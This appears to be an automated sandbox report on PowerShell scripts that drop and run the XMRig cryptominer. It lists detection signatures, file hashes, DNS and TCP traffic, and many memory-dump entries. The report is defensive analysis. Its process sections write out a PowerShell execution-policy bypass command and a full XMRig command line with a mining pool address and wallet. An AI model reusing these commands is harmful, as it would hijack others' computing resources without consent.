memory/1636-124-0x00007FF64D5D0000-0x00007FF64E203000-memory.dmp

memory/1636-125-0x00007FF64D5D0000-0x00007FF64E203000-memory.dmp

memory/1636-126-0x00007FF64D5D0000-0x00007FF64E203000-memory.dmp

memory/1636-127-0x00007FF64D5D0000-0x00007FF64E203000-memory.dmp

memory/1636-128-0x00007FF64D5D0000-0x00007FF64E203000-memory.dmp

memory/1636-129-0x00007FF64D5D0000-0x00007FF64E203000-memory.dmp

memory/1636-130-0x00007FF64D5D0000-0x00007FF64E203000-memory.dmp

memory/1636-131-0x00007FF64D5D0000-0x00007FF64E203000-memory.dmp

memory/1636-132-0x00007FF64D5D0000-0x00007FF64E203000-memory.dmp

memory/1636-133-0x00007FF64D5D0000-0x00007FF64E203000-memory.dmp

memory/1636-134-0x00007FF64D5D0000-0x00007FF64E203000-memory.dmp

memory/1636-135-0x00007FF64D5D0000-0x00007FF64E203000-memory.dmp

memory/1636-136-0x00007FF64D5D0000-0x00007FF64E203000-memory.dmp

memory/1636-137-0x00007FF64D5D0000-0x00007FF64E203000-memory.dmp

memory/1636-138-0x00007FF64D5D0000-0x00007FF64E203000-memory.dmp

memory/1636-139-0x00007FF64D5D0000-0x00007FF64E203000-memory.dmp

memory/1636-140-0x00007FF64D5D0000-0x00007FF64E203000-memory.dmp

memory/1636-141-0x00007FF64D5D0000-0x00007FF64E203000-memory.dmp

memory/1636-142-0x00007FF64D5D0000-0x00007FF64E203000-memory.dmp

memory/1636-143-0x00007FF64D5D0000-0x00007FF64E203000-memory.dmp

memory/1636-144-0x00007FF64D5D0000-0x00007FF64E203000-memory.dmp

memory/1636-145-0x00007FF64D5D0000-0x00007FF64E203000-memory.dmp

memory/1636-146-0x00007FF64D5D0000-0x00007FF64E203000-memory.dmp

memory/1636-147-0x00007FF64D5D0000-0x00007FF64E203000-memory.dmp

memory/1636-148-0x00007FF64D5D0000-0x00007FF64E203000-memory.dmp

memory/1636-149-0x00007FF64D5D0000-0x00007FF64E203000-memory.dmp

memory/1636-150-0x00007FF64D5D0000-0x00007FF64E203000-memory.dmp

memory/1636-151-0x00007FF64D5D0000-0x00007FF64E203000-memory.dmp

memory/1636-152-0x00007FF64D5D0000-0x00007FF64E203000-memory.dmp

memory/1636-153-0x00007FF64D5D0000-0x00007FF64E203000-memory.dmp

memory/1636-154-0x00007FF64D5D0000-0x00007FF64E203000-memory.dmp

memory/1636-155-0x00007FF64D5D0000-0x00007FF64E203000-memory.dmp

memory/1636-156-0x00007FF64D5D0000-0x00007FF64E203000-memory.dmp

Analysis: behavioral31

Detonation Overview

Submitted

2024-05-26 13:33

Reported

2024-05-27 03:40

Platform

win10v2004-20240508-en

Max time kernel

1791s

Max time network

1780s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.111.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 18.24.18.2.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.111.199.185.in-addr.arpa udp
US 8.8.8.8:53 4.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
US 8.8.8.8:53 26.35.223.20.in-addr.arpa udp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
SE 184.31.15.184:443 www.bing.com tcp
US 8.8.8.8:53 184.15.31.184.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 157.123.68.40.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 31.121.18.2.in-addr.arpa udp
US 8.8.8.8:53 25.24.18.2.in-addr.arpa udp
US 8.8.8.8:53 30.73.42.20.in-addr.arpa udp

Files

memory/4700-1-0x00007FFA49210000-0x00007FFA49405000-memory.dmp

memory/4700-7-0x00007FFA49210000-0x00007FFA49405000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_acw32ysg.04q.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4700-0-0x00007FFA49210000-0x00007FFA49405000-memory.dmp

memory/4700-12-0x0000028BE0FE0000-0x0000028BE1002000-memory.dmp

memory/4700-14-0x00007FFA49210000-0x00007FFA49405000-memory.dmp

memory/4700-15-0x0000028BE1C70000-0x0000028BE1C82000-memory.dmp

memory/4700-16-0x0000028BE1060000-0x0000028BE106A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/4352-47-0x000002D9F62D0000-0x000002D9F62F0000-memory.dmp

memory/4352-48-0x00007FFA49210000-0x00007FFA49405000-memory.dmp

memory/4352-49-0x00007FF711380000-0x00007FF711FB3000-memory.dmp

memory/4352-51-0x00007FFA49210000-0x00007FFA49405000-memory.dmp

memory/4352-50-0x00007FF711380000-0x00007FF711FB3000-memory.dmp

memory/4700-52-0x00007FFA49210000-0x00007FFA49405000-memory.dmp

memory/4700-54-0x00007FFA49210000-0x00007FFA49405000-memory.dmp

memory/4352-53-0x00007FF711380000-0x00007FF711FB3000-memory.dmp

memory/4352-55-0x00007FF711380000-0x00007FF711FB3000-memory.dmp

memory/4352-56-0x00007FF711380000-0x00007FF711FB3000-memory.dmp

memory/4352-57-0x00007FF711380000-0x00007FF711FB3000-memory.dmp

memory/4352-58-0x00007FF711380000-0x00007FF711FB3000-memory.dmp

memory/4352-59-0x00007FF711380000-0x00007FF711FB3000-memory.dmp

memory/4352-60-0x00007FF711380000-0x00007FF711FB3000-memory.dmp

memory/4352-61-0x00007FF711380000-0x00007FF711FB3000-memory.dmp

memory/4352-62-0x00007FF711380000-0x00007FF711FB3000-memory.dmp

memory/4352-63-0x00007FF711380000-0x00007FF711FB3000-memory.dmp

memory/4352-64-0x00007FF711380000-0x00007FF711FB3000-memory.dmp

memory/4352-65-0x00007FF711380000-0x00007FF711FB3000-memory.dmp

memory/4352-66-0x00007FF711380000-0x00007FF711FB3000-memory.dmp

memory/4352-67-0x00007FF711380000-0x00007FF711FB3000-memory.dmp

memory/4352-68-0x00007FF711380000-0x00007FF711FB3000-memory.dmp

memory/4352-69-0x00007FF711380000-0x00007FF711FB3000-memory.dmp

memory/4352-70-0x00007FF711380000-0x00007FF711FB3000-memory.dmp

memory/4352-71-0x00007FF711380000-0x00007FF711FB3000-memory.dmp

memory/4352-72-0x00007FF711380000-0x00007FF711FB3000-memory.dmp

memory/4352-73-0x00007FF711380000-0x00007FF711FB3000-memory.dmp

memory/4352-74-0x00007FF711380000-0x00007FF711FB3000-memory.dmp

memory/4352-75-0x00007FF711380000-0x00007FF711FB3000-memory.dmp

memory/4352-76-0x00007FF711380000-0x00007FF711FB3000-memory.dmp

memory/4352-77-0x00007FF711380000-0x00007FF711FB3000-memory.dmp

memory/4352-78-0x00007FF711380000-0x00007FF711FB3000-memory.dmp

memory/4352-79-0x00007FF711380000-0x00007FF711FB3000-memory.dmp

memory/4352-80-0x00007FF711380000-0x00007FF711FB3000-memory.dmp

memory/4352-81-0x00007FF711380000-0x00007FF711FB3000-memory.dmp

memory/4352-82-0x00007FF711380000-0x00007FF711FB3000-memory.dmp

memory/4352-83-0x00007FF711380000-0x00007FF711FB3000-memory.dmp

memory/4352-84-0x00007FF711380000-0x00007FF711FB3000-memory.dmp

memory/4352-85-0x00007FF711380000-0x00007FF711FB3000-memory.dmp

memory/4352-86-0x00007FF711380000-0x00007FF711FB3000-memory.dmp

memory/4352-87-0x00007FF711380000-0x00007FF711FB3000-memory.dmp

memory/4352-88-0x00007FF711380000-0x00007FF711FB3000-memory.dmp

memory/4352-89-0x00007FF711380000-0x00007FF711FB3000-memory.dmp

memory/4352-90-0x00007FF711380000-0x00007FF711FB3000-memory.dmp

memory/4352-91-0x00007FF711380000-0x00007FF711FB3000-memory.dmp

memory/4352-92-0x00007FF711380000-0x00007FF711FB3000-memory.dmp

memory/4352-93-0x00007FF711380000-0x00007FF711FB3000-memory.dmp

memory/4352-94-0x00007FF711380000-0x00007FF711FB3000-memory.dmp

memory/4352-95-0x00007FF711380000-0x00007FF711FB3000-memory.dmp

memory/4352-96-0x00007FF711380000-0x00007FF711FB3000-memory.dmp

memory/4352-97-0x00007FF711380000-0x00007FF711FB3000-memory.dmp

memory/4352-98-0x00007FF711380000-0x00007FF711FB3000-memory.dmp

memory/4352-99-0x00007FF711380000-0x00007FF711FB3000-memory.dmp

memory/4352-100-0x00007FF711380000-0x00007FF711FB3000-memory.dmp

memory/4352-101-0x00007FF711380000-0x00007FF711FB3000-memory.dmp

memory/4352-102-0x00007FF711380000-0x00007FF711FB3000-memory.dmp

memory/4352-103-0x00007FF711380000-0x00007FF711FB3000-memory.dmp

memory/4352-104-0x00007FF711380000-0x00007FF711FB3000-memory.dmp

memory/4352-105-0x00007FF711380000-0x00007FF711FB3000-memory.dmp

memory/4352-106-0x00007FF711380000-0x00007FF711FB3000-memory.dmp

memory/4352-107-0x00007FF711380000-0x00007FF711FB3000-memory.dmp

memory/4352-108-0x00007FF711380000-0x00007FF711FB3000-memory.dmp

memory/4352-109-0x00007FF711380000-0x00007FF711FB3000-memory.dmp

memory/4352-110-0x00007FF711380000-0x00007FF711FB3000-memory.dmp

memory/4352-111-0x00007FF711380000-0x00007FF711FB3000-memory.dmp

memory/4352-112-0x00007FF711380000-0x00007FF711FB3000-memory.dmp

memory/4352-113-0x00007FF711380000-0x00007FF711FB3000-memory.dmp

memory/4352-114-0x00007FF711380000-0x00007FF711FB3000-memory.dmp

Analysis: behavioral7

Detonation Overview

Submitted

2024-05-26 13:33

Reported

2024-05-27 00:49

Platform

win10v2004-20240426-en

Max time kernel

1799s

Max time network

1797s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (3).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (3).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 76.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 13.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 14.179.89.13.in-addr.arpa udp

Files

memory/3240-0-0x00007FFD82D83000-0x00007FFD82D85000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_dsotwyiv.qnh.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3240-6-0x0000014D2F5D0000-0x0000014D2F5F2000-memory.dmp

memory/3240-11-0x00007FFD82D80000-0x00007FFD83841000-memory.dmp

memory/3240-12-0x00007FFD82D80000-0x00007FFD83841000-memory.dmp

memory/3240-14-0x00007FFD82D80000-0x00007FFD83841000-memory.dmp

memory/3240-15-0x0000014D300A0000-0x0000014D300B2000-memory.dmp

memory/3240-16-0x0000014D30080000-0x0000014D3008A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/3252-47-0x0000024A0AF50000-0x0000024A0AF70000-memory.dmp

memory/3252-48-0x0000024A0C840000-0x0000024A0C860000-memory.dmp

memory/3252-49-0x00007FF75D3A0000-0x00007FF75DFD3000-memory.dmp

memory/3252-51-0x0000024A0C880000-0x0000024A0C8A0000-memory.dmp

memory/3252-50-0x0000024A0C860000-0x0000024A0C880000-memory.dmp

memory/3252-52-0x00007FF75D3A0000-0x00007FF75DFD3000-memory.dmp

memory/3240-53-0x00007FFD82D83000-0x00007FFD82D85000-memory.dmp

memory/3240-54-0x00007FFD82D80000-0x00007FFD83841000-memory.dmp

memory/3252-55-0x00007FF75D3A0000-0x00007FF75DFD3000-memory.dmp

memory/3240-56-0x00007FFD82D80000-0x00007FFD83841000-memory.dmp

memory/3252-57-0x00007FF75D3A0000-0x00007FF75DFD3000-memory.dmp

memory/3252-59-0x0000024A0C880000-0x0000024A0C8A0000-memory.dmp

memory/3252-58-0x0000024A0C860000-0x0000024A0C880000-memory.dmp

memory/3252-60-0x00007FF75D3A0000-0x00007FF75DFD3000-memory.dmp

memory/3252-61-0x00007FF75D3A0000-0x00007FF75DFD3000-memory.dmp

memory/3252-62-0x00007FF75D3A0000-0x00007FF75DFD3000-memory.dmp

memory/3252-63-0x00007FF75D3A0000-0x00007FF75DFD3000-memory.dmp

memory/3252-64-0x00007FF75D3A0000-0x00007FF75DFD3000-memory.dmp

memory/3252-65-0x00007FF75D3A0000-0x00007FF75DFD3000-memory.dmp

memory/3252-66-0x00007FF75D3A0000-0x00007FF75DFD3000-memory.dmp

memory/3252-67-0x00007FF75D3A0000-0x00007FF75DFD3000-memory.dmp

memory/3252-68-0x00007FF75D3A0000-0x00007FF75DFD3000-memory.dmp

memory/3252-69-0x00007FF75D3A0000-0x00007FF75DFD3000-memory.dmp

memory/3252-70-0x00007FF75D3A0000-0x00007FF75DFD3000-memory.dmp

memory/3252-71-0x00007FF75D3A0000-0x00007FF75DFD3000-memory.dmp

memory/3252-72-0x00007FF75D3A0000-0x00007FF75DFD3000-memory.dmp

memory/3252-73-0x00007FF75D3A0000-0x00007FF75DFD3000-memory.dmp

memory/3252-74-0x00007FF75D3A0000-0x00007FF75DFD3000-memory.dmp

memory/3252-75-0x00007FF75D3A0000-0x00007FF75DFD3000-memory.dmp

memory/3252-76-0x00007FF75D3A0000-0x00007FF75DFD3000-memory.dmp

memory/3252-77-0x00007FF75D3A0000-0x00007FF75DFD3000-memory.dmp

memory/3252-78-0x00007FF75D3A0000-0x00007FF75DFD3000-memory.dmp

memory/3252-79-0x00007FF75D3A0000-0x00007FF75DFD3000-memory.dmp

memory/3252-80-0x00007FF75D3A0000-0x00007FF75DFD3000-memory.dmp

memory/3252-81-0x00007FF75D3A0000-0x00007FF75DFD3000-memory.dmp

memory/3252-82-0x00007FF75D3A0000-0x00007FF75DFD3000-memory.dmp

memory/3252-83-0x00007FF75D3A0000-0x00007FF75DFD3000-memory.dmp

memory/3252-84-0x00007FF75D3A0000-0x00007FF75DFD3000-memory.dmp

memory/3252-85-0x00007FF75D3A0000-0x00007FF75DFD3000-memory.dmp

memory/3252-86-0x00007FF75D3A0000-0x00007FF75DFD3000-memory.dmp

memory/3252-87-0x00007FF75D3A0000-0x00007FF75DFD3000-memory.dmp

memory/3252-88-0x00007FF75D3A0000-0x00007FF75DFD3000-memory.dmp

memory/3252-89-0x00007FF75D3A0000-0x00007FF75DFD3000-memory.dmp

memory/3252-90-0x00007FF75D3A0000-0x00007FF75DFD3000-memory.dmp

memory/3252-91-0x00007FF75D3A0000-0x00007FF75DFD3000-memory.dmp

memory/3252-92-0x00007FF75D3A0000-0x00007FF75DFD3000-memory.dmp

memory/3252-93-0x00007FF75D3A0000-0x00007FF75DFD3000-memory.dmp

memory/3252-94-0x00007FF75D3A0000-0x00007FF75DFD3000-memory.dmp

memory/3252-95-0x00007FF75D3A0000-0x00007FF75DFD3000-memory.dmp

memory/3252-96-0x00007FF75D3A0000-0x00007FF75DFD3000-memory.dmp

memory/3252-97-0x00007FF75D3A0000-0x00007FF75DFD3000-memory.dmp

memory/3252-98-0x00007FF75D3A0000-0x00007FF75DFD3000-memory.dmp

memory/3252-99-0x00007FF75D3A0000-0x00007FF75DFD3000-memory.dmp

memory/3252-100-0x00007FF75D3A0000-0x00007FF75DFD3000-memory.dmp

memory/3252-101-0x00007FF75D3A0000-0x00007FF75DFD3000-memory.dmp

memory/3252-102-0x00007FF75D3A0000-0x00007FF75DFD3000-memory.dmp

memory/3252-103-0x00007FF75D3A0000-0x00007FF75DFD3000-memory.dmp

memory/3252-104-0x00007FF75D3A0000-0x00007FF75DFD3000-memory.dmp

memory/3252-105-0x00007FF75D3A0000-0x00007FF75DFD3000-memory.dmp

memory/3252-106-0x00007FF75D3A0000-0x00007FF75DFD3000-memory.dmp

memory/3252-107-0x00007FF75D3A0000-0x00007FF75DFD3000-memory.dmp

memory/3252-108-0x00007FF75D3A0000-0x00007FF75DFD3000-memory.dmp

memory/3252-109-0x00007FF75D3A0000-0x00007FF75DFD3000-memory.dmp

memory/3252-110-0x00007FF75D3A0000-0x00007FF75DFD3000-memory.dmp

memory/3252-111-0x00007FF75D3A0000-0x00007FF75DFD3000-memory.dmp

memory/3252-112-0x00007FF75D3A0000-0x00007FF75DFD3000-memory.dmp

memory/3252-113-0x00007FF75D3A0000-0x00007FF75DFD3000-memory.dmp

memory/3252-114-0x00007FF75D3A0000-0x00007FF75DFD3000-memory.dmp

memory/3252-115-0x00007FF75D3A0000-0x00007FF75DFD3000-memory.dmp

memory/3252-116-0x00007FF75D3A0000-0x00007FF75DFD3000-memory.dmp

memory/3252-117-0x00007FF75D3A0000-0x00007FF75DFD3000-memory.dmp

memory/3252-118-0x00007FF75D3A0000-0x00007FF75DFD3000-memory.dmp

Analysis: behavioral25

Detonation Overview

Submitted

2024-05-26 13:33

Reported

2024-05-27 00:58

Platform

win10-20240404-en

Max time kernel

1795s

Max time network

1784s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (8).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
